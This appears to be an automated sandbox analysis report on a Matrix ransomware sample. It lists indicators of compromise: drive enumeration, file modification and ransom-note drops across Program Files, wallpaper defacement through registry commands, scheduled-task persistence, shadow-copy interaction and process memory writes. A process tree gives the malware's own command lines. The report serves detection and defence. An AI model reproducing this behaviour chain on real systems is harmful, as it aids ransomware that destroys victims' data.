description	ioc	Process
File opened (read-only)	\??\T:	CnRDNN7F64.exe
File opened (read-only)	\??\Y:	CnRDNN7F64.exe
File opened (read-only)	\??\Z:	CnRDNN7F64.exe
File opened (read-only)	\??\R:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\N:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\G:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\A:	CnRDNN7F64.exe
File opened (read-only)	\??\L:	CnRDNN7F64.exe
File opened (read-only)	\??\Q:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\H:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\G:	CnRDNN7F64.exe
File opened (read-only)	\??\Z:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\Y:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\W:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\V:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\U:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\X:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\P:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\I:	CnRDNN7F64.exe
File opened (read-only)	\??\L:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\J:	CnRDNN7F64.exe
File opened (read-only)	\??\N:	CnRDNN7F64.exe
File opened (read-only)	\??\P:	CnRDNN7F64.exe
File opened (read-only)	\??\Q:	CnRDNN7F64.exe
File opened (read-only)	\??\W:	CnRDNN7F64.exe
File opened (read-only)	\??\O:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\I:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\F:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\E:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\E:	CnRDNN7F64.exe
File opened (read-only)	\??\S:	CnRDNN7F64.exe
File opened (read-only)	\??\M:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\B:	CnRDNN7F64.exe
File opened (read-only)	\??\M:	CnRDNN7F64.exe
File opened (read-only)	\??\O:	CnRDNN7F64.exe
File opened (read-only)	\??\R:	CnRDNN7F64.exe
File opened (read-only)	\??\S:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\J:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\F:	CnRDNN7F64.exe
File opened (read-only)	\??\X:	CnRDNN7F64.exe
File opened (read-only)	\??\V:	CnRDNN7F64.exe
File opened (read-only)	\??\T:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\K:	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened (read-only)	\??\H:	CnRDNN7F64.exe
File opened (read-only)	\??\K:	CnRDNN7F64.exe
File opened (read-only)	\??\U:	CnRDNN7F64.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\FU2wAjvh.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\youtube.crx	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\ext\meta-index	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Abidjan	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Mozilla Firefox\update-settings.ini	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-io.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Adak	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Godthab	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Ojinaga	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Mexico_City	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\cs.pak	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Hovd	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-3	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Microsoft Games\Minesweeper\de-DE\Minesweeper.exe.mui	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_ja.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Hermosillo	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\de-DE\Solitaire.exe.mui	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Microsoft Games\Purble Place\es-ES\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\classlist	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Chisinau	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Qatar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\reader\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Resolute	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\New_Skins.url	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\de-DE\bckgzm.exe.mui	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\ja.pak	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\BBGT_INFO.rtf	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
432	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1388	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1152	CnRDNN7F64.exe
1152	CnRDNN7F64.exe
1152	CnRDNN7F64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1152	CnRDNN7F64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1152	CnRDNN7F64.exe
Token: SeLoadDriverPrivilege	1152	CnRDNN7F64.exe
Token: SeBackupPrivilege	520	vssvc.exe
Token: SeRestorePrivilege	520	vssvc.exe
Token: SeAuditPrivilege	520	vssvc.exe
Token: SeTakeOwnershipPrivilege	1680	takeown.exe
Token: SeTakeOwnershipPrivilege	956	takeown.exe
Token: SeTakeOwnershipPrivilege	1580	takeown.exe
Token: SeTakeOwnershipPrivilege	1904	takeown.exe
Token: SeTakeOwnershipPrivilege	592	takeown.exe
Token: SeTakeOwnershipPrivilege	1372	takeown.exe
Token: SeTakeOwnershipPrivilege	1544	takeown.exe
Token: SeTakeOwnershipPrivilege	776	takeown.exe
Token: SeTakeOwnershipPrivilege	1372	takeown.exe
Token: SeTakeOwnershipPrivilege	1168	takeown.exe
Token: SeTakeOwnershipPrivilege	1416	takeown.exe
Token: SeTakeOwnershipPrivilege	1968	takeown.exe
Token: SeTakeOwnershipPrivilege	1520	takeown.exe
Token: SeTakeOwnershipPrivilege	964	takeown.exe
Token: SeTakeOwnershipPrivilege	1104	takeown.exe
Token: SeTakeOwnershipPrivilege	1108	takeown.exe
Token: SeTakeOwnershipPrivilege	1980	takeown.exe
Token: SeTakeOwnershipPrivilege	1084	takeown.exe
Token: SeIncreaseQuotaPrivilege	1596	WMIC.exe
Token: SeSecurityPrivilege	1596	WMIC.exe
Token: SeTakeOwnershipPrivilege	1596	WMIC.exe
Token: SeLoadDriverPrivilege	1596	WMIC.exe
Token: SeSystemProfilePrivilege	1596	WMIC.exe
Token: SeSystemtimePrivilege	1596	WMIC.exe
Token: SeProfSingleProcessPrivilege	1596	WMIC.exe
Token: SeIncBasePriorityPrivilege	1596	WMIC.exe
Token: SeCreatePagefilePrivilege	1596	WMIC.exe
Token: SeBackupPrivilege	1596	WMIC.exe
Token: SeRestorePrivilege	1596	WMIC.exe
Token: SeShutdownPrivilege	1596	WMIC.exe
Token: SeDebugPrivilege	1596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1596	WMIC.exe
Token: SeRemoteShutdownPrivilege	1596	WMIC.exe
Token: SeUndockPrivilege	1596	WMIC.exe
Token: SeManageVolumePrivilege	1596	WMIC.exe
Token: 33	1596	WMIC.exe
Token: 34	1596	WMIC.exe
Token: 35	1596	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1596	WMIC.exe
Token: SeSecurityPrivilege	1596	WMIC.exe
Token: SeTakeOwnershipPrivilege	1596	WMIC.exe
Token: SeLoadDriverPrivilege	1596	WMIC.exe
Token: SeSystemProfilePrivilege	1596	WMIC.exe
Token: SeSystemtimePrivilege	1596	WMIC.exe
Token: SeProfSingleProcessPrivilege	1596	WMIC.exe
Token: SeIncBasePriorityPrivilege	1596	WMIC.exe
Token: SeCreatePagefilePrivilege	1596	WMIC.exe
Token: SeBackupPrivilege	1596	WMIC.exe
Token: SeRestorePrivilege	1596	WMIC.exe
Token: SeShutdownPrivilege	1596	WMIC.exe
Token: SeDebugPrivilege	1596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1596	WMIC.exe
Token: SeRemoteShutdownPrivilege	1596	WMIC.exe
Token: SeUndockPrivilege	1596	WMIC.exe
Token: SeManageVolumePrivilege	1596	WMIC.exe
Token: 33	1596	WMIC.exe
Token: 34	1596	WMIC.exe
Token: 35	1596	WMIC.exe
Token: SeTakeOwnershipPrivilege	736	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1208 wrote to memory of 608	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	28
PID 1208 wrote to memory of 608	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	28
PID 1208 wrote to memory of 608	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	28
PID 1208 wrote to memory of 608	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	28
PID 1208 wrote to memory of 2028	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	30
PID 1208 wrote to memory of 2028	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	30
PID 1208 wrote to memory of 2028	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	30
PID 1208 wrote to memory of 2028	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	30
PID 1208 wrote to memory of 596	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	32
PID 1208 wrote to memory of 596	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	32
PID 1208 wrote to memory of 596	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	32
PID 1208 wrote to memory of 596	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	32
PID 1208 wrote to memory of 784	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	34
PID 1208 wrote to memory of 784	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	34
PID 1208 wrote to memory of 784	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	34
PID 1208 wrote to memory of 784	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	34
PID 596 wrote to memory of 452	596	cmd.exe	35
PID 596 wrote to memory of 452	596	cmd.exe	35
PID 596 wrote to memory of 452	596	cmd.exe	35
PID 596 wrote to memory of 452	596	cmd.exe	35
PID 596 wrote to memory of 384	596	cmd.exe	37
PID 596 wrote to memory of 384	596	cmd.exe	37
PID 596 wrote to memory of 384	596	cmd.exe	37
PID 596 wrote to memory of 384	596	cmd.exe	37
PID 596 wrote to memory of 512	596	cmd.exe	39
PID 596 wrote to memory of 512	596	cmd.exe	39
PID 596 wrote to memory of 512	596	cmd.exe	39
PID 596 wrote to memory of 512	596	cmd.exe	39
PID 784 wrote to memory of 728	784	cmd.exe	38
PID 784 wrote to memory of 728	784	cmd.exe	38
PID 784 wrote to memory of 728	784	cmd.exe	38
PID 784 wrote to memory of 728	784	cmd.exe	38
PID 1208 wrote to memory of 1628	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	40
PID 1208 wrote to memory of 1628	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	40
PID 1208 wrote to memory of 1628	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	40
PID 1208 wrote to memory of 1628	1208	226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe	40
PID 1628 wrote to memory of 1140	1628	cmd.exe	42
PID 1628 wrote to memory of 1140	1628	cmd.exe	42
PID 1628 wrote to memory of 1140	1628	cmd.exe	42
PID 1628 wrote to memory of 1140	1628	cmd.exe	42
PID 1628 wrote to memory of 1564	1628	cmd.exe	43
PID 1628 wrote to memory of 1564	1628	cmd.exe	43
PID 1628 wrote to memory of 1564	1628	cmd.exe	43
PID 1628 wrote to memory of 1564	1628	cmd.exe	43
PID 1628 wrote to memory of 1692	1628	cmd.exe	44
PID 1628 wrote to memory of 1692	1628	cmd.exe	44
PID 1628 wrote to memory of 1692	1628	cmd.exe	44
PID 1628 wrote to memory of 1692	1628	cmd.exe	44
PID 1692 wrote to memory of 2004	1692	cmd.exe	45
PID 1692 wrote to memory of 2004	1692	cmd.exe	45
PID 1692 wrote to memory of 2004	1692	cmd.exe	45
PID 1692 wrote to memory of 2004	1692	cmd.exe	45
PID 2004 wrote to memory of 1152	2004	CnRDNN7F.exe	46
PID 2004 wrote to memory of 1152	2004	CnRDNN7F.exe	46
PID 2004 wrote to memory of 1152	2004	CnRDNN7F.exe	46
PID 2004 wrote to memory of 1152	2004	CnRDNN7F.exe	46
PID 728 wrote to memory of 832	728	wscript.exe	47
PID 728 wrote to memory of 832	728	wscript.exe	47
PID 728 wrote to memory of 832	728	wscript.exe	47
PID 728 wrote to memory of 832	728	wscript.exe	47
PID 832 wrote to memory of 432	832	cmd.exe	49
PID 832 wrote to memory of 432	832	cmd.exe	49
PID 832 wrote to memory of 432	832	cmd.exe	49
PID 832 wrote to memory of 432	832	cmd.exe	49

C:\Users\Admin\AppData\Local\Temp\226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe
"C:\Users\Admin\AppData\Local\Temp\226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1208
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\226e17cfbb96351f5685baa039c1c4d2cb4d3d94172ea3bb0cfb7238a91abaf6.exe" "C:\Users\Admin\AppData\Local\Temp\NWE1ahVz.exe"
  2⤵
  PID:608
- C:\Users\Admin\AppData\Local\Temp\NWE1ahVz.exe
  "C:\Users\Admin\AppData\Local\Temp\NWE1ahVz.exe" -n
  2⤵
  - Executes dropped EXE
  PID:2028
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\FU2wAjvh.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:596
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\FU2wAjvh.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:452
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:384
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:512
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kYVxYCrD.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:784
